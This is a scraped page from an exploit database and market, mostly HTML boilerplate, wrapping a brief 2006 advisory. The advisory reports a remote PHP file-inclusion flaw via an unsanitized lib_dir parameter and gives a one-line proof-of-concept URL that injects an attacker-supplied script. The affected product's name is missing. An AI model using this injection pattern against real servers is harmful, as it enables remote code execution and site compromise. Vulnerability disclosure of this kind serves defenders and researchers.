-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy path1006.txt
345 lines (290 loc) · 16.3 KB
/
1006.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
<meta name='description' content="">
<meta name='keywords' content="">
<link rel='stylesheet' href='/style?1591953375' type='text/css' media='all' />
<link rel='stylesheet' href='/skin/green?1591953375' type='text/css' media='all' />
<link rel='stylesheet' href='/qtip_style' type='text/css' media='all' />
<link rel='stylesheet' href='/fancybox_style' >
<script type='text/javascript' src='/jquery'></script>
<script type='text/javascript' src='/qtip_js'></script>
<script type='text/javascript' src='/upl1'></script>
<script type='text/javascript' src='/upl2'></script>
<script type='text/javascript' src='/fancybox'></script>
<script src='/chart_js'></script>
<script type='text/javascript'>
$(document).ready(function() {
$('.popup').fancybox({
fitToView : true,
autoSize : true,
closeClick : false,
openEffect : 'elastic',
closeEffect : 'elastic'
});
$('.popup_modal').fancybox({
modal : true,
width : '100%',
height : '100%',
fitToView : true,
autoSize : false,
closeClick : false,
openEffect : 'elastic',
closeEffect : 'elastic'
});
});
</script>
<script type='text/javascript'>
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-23466659-1']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head>
<body onload='onloadpage()' ><div class='menu' style='text-align:center; width:1200px;'>[ <a href='/'>home</a> ] [ <a href='/private' class=''>private</a> ] [ <a href='/0day' class='RedText'>0Day</a> ] [ <a href='/discount'>discount</a> ] [ <a href='/gold' class='YellowTextGold'> Get Gold </a> ] [ <a href='/platforms'>platforms</a> ] [ <a href='/pentest'>pentest</a> ] [ <a href='/hash'>hash</a> ] [ <a href='/search'>search</a> ] [ <a href='/faq' class='RedText'>faq</a> ] [ <a href='/contacts'>contact</a> ] [ <a href='/style/change' alt=''>style</a> ] [ <a href='/btc/change' class='YellowTextBtc'>Prices in Gold</a> ] <span class='YellowText'>db:</span> <span class='RedText'>34 387</span> <div class='menu_icon'><a title='0day Today Exploit DB Official Facebook' href='http://www.facebook.com/Inj3ct0rs' target='_Blank'><img src='/img/fb.png' alt='0day Today Exploit DB Official Facebook'></a></div> <div class='menu_icon'><a title='0day Today Exploit DB Official Twitter ' href='http://twitter.com/Inj3ct0r' target='_Blank'><img src='/img/tw.png' alt='0day Today Exploit DB Official Twitter '></a></div> <div class='menu_icon'><a title='0day Today Exploit DB Official RSS Channel' href='/rss' target='_Blank'><img src='/img/rss.png' alt='0day Today Exploit DB Official RSS Channel'></a></div> <div class='menu_icon'><a title='Tor Network' href='http://mvfjfugdwgc5uwho.onion' target='_Blank'><img src='/img/tor3.png' alt='Tor'></a></div> </div><div class='content'>
<div class='popup_welcome ' id='popup_welcome_div'>
<a href='#popup_welcome_div' class='popup' id='popup_welcome'> </a>
<div class='pop_up_welcome_title'>
<strong><span class='RedText'>0day.today - Biggest Exploit Database in the World.</span></strong>
<div style='float:right; margin-top:-5px; heigth:24px; line-height:16px; '>
<div style='float:left; margin-top:3px;'>Select your language: </div>
<a class='' href='http://en.0day.today/exploit/1006'>
<img src='/img/langs/en.png' alt='English'>
<div class='TipText'>
English
</div>
</a><a class='' href='http://ru.0day.today/exploit/1006'>
<img src='/img/langs/ru.png' alt='Русский'>
<div class='TipText'>
Русский
</div>
</a><a class='' href='http://de.0day.today/exploit/1006'>
<img src='/img/langs/de.png' alt='Deutsch'>
<div class='TipText'>
Deutsch
</div>
</a><a class='' href='http://tr.0day.today/exploit/1006'>
<img src='/img/langs/tr.png' alt='Türkçe'>
<div class='TipText'>
Türkçe
</div>
</a><a class='' href='http://fr.0day.today/exploit/1006'>
<img src='/img/langs/fr.png' alt='Français'>
<div class='TipText'>
Français
</div>
</a><a class='' href='http://it.0day.today/exploit/1006'>
<img src='/img/langs/it.png' alt='Italiano'>
<div class='TipText'>
Italiano
</div>
</a><a class='' href='http://es.0day.today/exploit/1006'>
<img src='/img/langs/es.png' alt='Español'>
<div class='TipText'>
Español
</div>
</a><a class='' href='http://ro.0day.today/exploit/1006'>
<img src='/img/langs/ro.png' alt='Romania'>
<div class='TipText'>
Romania
</div>
</a><a class='' href='http://pl.0day.today/exploit/1006'>
<img src='/img/langs/pl.png' alt='Polskie'>
<div class='TipText'>
Polskie
</div>
</a><a class='' href='http://ar.0day.today/exploit/1006'>
<img src='/img/langs/ar.png' alt='العربية'>
<div class='TipText'>
العربية
</div>
</a><a class='' href='http://jp.0day.today/exploit/1006'>
<img src='/img/langs/jp.png' alt='Japan'>
<div class='TipText'>
Japan
</div>
</a><a class='' href='http://cn.0day.today/exploit/1006'>
<img src='/img/langs/cn.png' alt='China'>
<div class='TipText'>
China
</div>
</a>
</div>
</div>
<div style='float:left; background:#000; width:480px; border-right:1px solid #004000; text-align:justify; margin:10px 0px 0px 0px; padding:0px 15px 0px 0px;'>
<div class='centertext'><img src='/img/logo_green.jpg' style='width:400px;'></div>
<div class='spacer'></div>
Things you should know about 0day.today:
<ul>
<li>We use one main domain: <a href='http://0day.today'>http://0day.today</a></li>
<li>Most of the materials is <span class='YellowText'>completely FREE</span></li>
<li>If you want to <span class='RedText'>purchase the exploit</span> / <span class='RedText'>get V.I.P. access</span> or pay for any other service, <br>you need to buy or earn <img src='/img/gold.gif'> <span class='GoldText'>GOLD</span></li>
</ul>
<div class='spacer'></div>
<div class='center'>
We accept currencies: [<a href='/contacts' target=_blank>contact admin to find more</a>]
<div class='half_spacer'></div>
<a href='/gold'><img src='/img/bitcoin.png' style='width:150px;'></a>
<a href='/gold'><img src='/img/litecoin.png' style='width:150px;'></a>
<a href='/gold'><img src='/img/ethereum.png' style='width:150px;'></a>
</div>
<div class='spacer'></div>
<div class='spacer'></div>
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could
affect illegaly other users or websites that you don't have right to access will be banned
and your account including your data will be destroyed.<br><br>
Administration of this site uses the <a href='/contacts' target=_blank>official contacts</a>. Beware of impostors!
<div class='spacer'></div>
<div class='spacer'></div>
<div class='centertext'><a href='/popup/off' class='RedText'>I am registered user of 0day.today. I don't want to see this screen in future.</a></div>
</div>
<div style='float:left; background:#000; width:300px; padding:10px 0px;'>
<center><strong><span class='RedText'>What to do first?</span></strong></center>
<ol style='margin-left:25px;'>
<li>Read the [ <a href='/law' target='_blank'>agreement</a> ]</li>
<li>Read the [ <a href='/faq/how_publish' target='_blank'>Submit</a> ] rules</li>
<li>Visit the [ <a href='/faq' target='_blank'>faq</a> ] page</li>
<li>[ <a href='/reg' target='_blank'>Register</a> ] profile</li>
<li>Get [ <a href='/gold' target='_blank'>GOLD</a> ]</li>
<li>If you want to [ <a href='/faq/sell' target='_blank'>sell</a> ]</li>
<li>If you want to [ <a href='/faq/buy' target='_blank'>buy</a> ]</li>
<li>If you lost [ <a href='restore' target='_blank'>Account</a> ]</li>
<li>Any questions [ <a href='mailto:[email protected]'>[email protected]</a> ]</li>
</ol>
<br>
<br>
<center><strong><span class='RedText'>Main links</span></strong></center>
<ul style='margin-left:25px;'>
<li><a href='/auth'>Authorisation page</a></li>
<li><a href='/reg'>Registration page</a></li>
<li><a href='/restore'>Restore account page</a></li>
<li><a href='/faq'>FAQ page</a></li>
<li><a href='/contacts'>Contacts page</a></li>
<li><a href='/faq#submit'>Publishing rules</a></li>
<li><a href='/law'>Agreement page</a></li>
</ul>
<br>
<br>
<center><strong><span class='RedText'>You can contact us by</span></strong></center><br>
<div class='popup_contacts_items popup_contacts_mail'>
<div class='popup_contacts_items_title '>Mail:</div>
<div class='popup_contacts_items_text'><a href='mailto:[email protected]'>[email protected]</a></div>
</div>
<!--<div class='popup_contacts_items popup_contacts_jabber'>
<div class='popup_contacts_items_title '>Jabber:</span></strong></div>
<div class='popup_contacts_items_text'>[email protected]</div>
</div>
<div class='popup_contacts_items popup_contacts_skype'>
<div class='popup_contacts_items_title '>Skype:</span></strong></div>
<div class='popup_contacts_items_text'>Inj3ct0rs</div>
</div>
-->
<div class='popup_contacts_items popup_contacts_fb'>
<div class='popup_contacts_items_title '>Facebook:</span></strong></div>
<div class='popup_contacts_items_text'><a href='http://www.facebook.com/Inj3ct0rs' target='_blank'>Inj3ct0rs</a></div>
</div>
<div class='popup_contacts_items popup_contacts_twitter'>
<div class='popup_contacts_items_title '>Twitter:</span></strong></div>
<div class='popup_contacts_items_text'><a href='https://twitter.com/Inj3ct0r' target='_blank'>Inj3ct0r</a></div>
</div>
</div>
</div>
<div class='head_auth'>
<div class='menu_icon'><img src='/img/lock.png'></a></div>
[ <a href='/auth' class='RedText'>authorization</a> ]
[ <a href='/reg' class='RedText'>registration</a> ]
[ <a href='/restore' class='RedText'>restore account</a> ]
</div>
<div class='head_contacts '>
<a href='#contacts_popup' class='popup'>
<img src='/img/mail3.png'>
Contact us
<!--<img src='/img/skype.png'>
<img src='/img/jabber.png'>-->
</a>
</div>
<div id='contacts_popup'>
<div class='category_text strong'><span class='RedText'>You can contact us by:</span> </div>
<div class='spacer'></div>
<div class='popup_contacts_page'>
<div class='popup_contacts_items popup_contacts_mail'>
<div class='popup_contacts_items_title '>Mail:</div>
<div class='popup_contacts_items_text'><a href='mailto:[email protected]'>[email protected]</a></div>
</div>
<!--<div class='popup_contacts_items popup_contacts_jabber'>
<div class='popup_contacts_items_title YellowText'>Jabber:</span></strong></div>
<div class='popup_contacts_items_text'>[email protected]</div>
</div>
<div class='popup_contacts_items popup_contacts_skype'>
<div class='popup_contacts_items_title YellowText'>Skype:</span></strong></div>
<div class='popup_contacts_items_text'>Inj3ct0rs</div>
</div>-->
<div class='popup_contacts_items popup_contacts_fb'>
<div class='popup_contacts_items_title '>Facebook:</span></strong></div>
<div class='popup_contacts_items_text'><a href='http://www.facebook.com/Inj3ct0rs' target='_blank'>Inj3ct0rs</a></div>
</div>
<div class='popup_contacts_items popup_contacts_twitter'>
<div class='popup_contacts_items_title '>Twitter:</span></strong></div>
<div class='popup_contacts_items_text'><a href='https://twitter.com/Inj3ct0r' target='_blank'>Inj3ct0r</a></div>
</div>
</div>
</div>
<div class='head'>
<div class='double_spacer'></div>
<div class='double_spacer'></div><a href='/'><img src='/img/logo_green.jpg' alt='0day Today Exploits Market and 0day Exploits Database'></a>
</div>
<style>
.fancybox-inner {
background:#000000 url(/img/bg.gif);
}
.content{border:1px solid #008000; }
</style>
<script type='text/javascript' src='/hightlight_lib'></script>
<script type='text/javascript' src='/hightlight/plain'></script>
<link type='text/css' rel='stylesheet' href='/hightlight_style?1591953376'/>
<script type='text/javascript'>SyntaxHighlighter.all();</script>
<div style='font-size:11px; font-weight:bold;'>
<div style='float:left; width:80px; margin:5px 0px 0px 0px; font-weight:normal; color:#aaa'>Author</div>
<div style='float:left; width:150px; overflow:hidden; margin:5px 0px 0px 0px;' ><a href='/author/185' target=_blank>Kw3[R]Ln</a></div>
<div style='float:left; width:80px; margin:5px 0px 0px 0px; font-weight:normal; color:#aaa'>Risk</div>
<div style='float:left; width:190px; margin:5px 0px 0px 0px;' ><img src='/img/risk/critlow_0.gif'> [<span style='font-size:9px;'><div class='tips_risk_color_0'>Security Risk Unsored</div></span>]</div>
<div style='float:left; width:80px; margin:5px 0px 0px 0px; font-weight:normal; color:#aaa'>0day-ID</div>
<div style='float:left; margin:5px 0px 0px 0px;' ><a href='/exploit/description/1006' target=_blank>0day-ID-1006</a></div>
<div class='clear'></div>
<div style='float:left; width:80px; margin:5px 0px 0px 0px;font-weight:normal; color:#aaa'>Category</div>
<div style='float:left; width:150px; overflow:hidden; margin:5px 0px 0px 0px;' ><a href='/webapps'>web applications</a></div>
<div style='float:left; width:80px; margin:5px 0px 0px 0px; font-weight:normal; color:#aaa'>Date add</div>
<div style='float:left; width:190px;margin:5px 0px 0px 0px;' ><a href='/date/16-10-2006'>16-10-2006</a></div>
<div class='clear'></div>
<div style='float:left; width:80px; margin:5px 0px 0px 0px;font-weight:normal; color:#aaa'>Platform</div>
<div style='float:left; width:150px; overflow:hidden; margin:5px 0px 0px 0px;' >unsorted</div>
<div class='clear'></div>
</div>
=============================================================
---------------------------------------------------------------------------
---------------------------------------------------------------------------
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
version : 1.0
------------------------------------------------------------------
Exploit:
~~~~~~~
Variable $lib_dir not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.
# http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]
---------------------------------------------------------------------------
Shoutz:
~~~~~~
# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------
*/
Contact:
~~~
Nick: Kw3rLn
__/*